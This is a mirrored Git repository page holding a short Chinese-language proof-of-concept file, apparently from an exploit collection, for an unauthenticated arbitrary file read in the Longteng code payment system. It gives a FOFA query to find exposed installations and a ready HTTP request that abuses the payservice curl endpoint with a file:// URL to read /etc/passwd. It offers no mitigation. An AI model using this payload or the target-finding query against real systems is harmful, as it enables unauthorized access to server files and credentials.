admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-12 19:16:12 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/龙腾码支付/龙腾码支付payservicecurl任意文件读取.md

329 B
Raw Blame History

龙腾码支付payservicecurl任意文件读取

一、漏洞简介

龙腾码支付管理系统存在未授权的任意文件读取漏洞

二、影响版本

  • 龙腾码支付

三、资产测绘

  • fofabody="/epaydoc/epaydoc.php"

四、漏洞复现

GET /pay/service/curl?url=file:///etc/passwd HTTP/1.1